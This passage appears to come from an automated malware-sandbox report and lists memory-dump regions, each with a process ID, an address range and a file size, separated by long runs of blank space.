                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/2672-12070-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              400KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/2900-5298-0x0000000000400000-0x0000000000450000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              320KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/2936-3337-0x0000000000400000-0x000000000048E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              568KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/3036-12067-0x0000000000400000-0x000000000043B000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/3928-8865-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              128KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/3928-8859-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              128KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/3928-8860-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              128KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/3928-8861-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              128KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/3928-8862-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              128KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/3928-1778-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6048-12059-0x0000000000400000-0x000000000045E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              376KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/6048-12060-0x0000000000400000-0x000000000045E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              376KB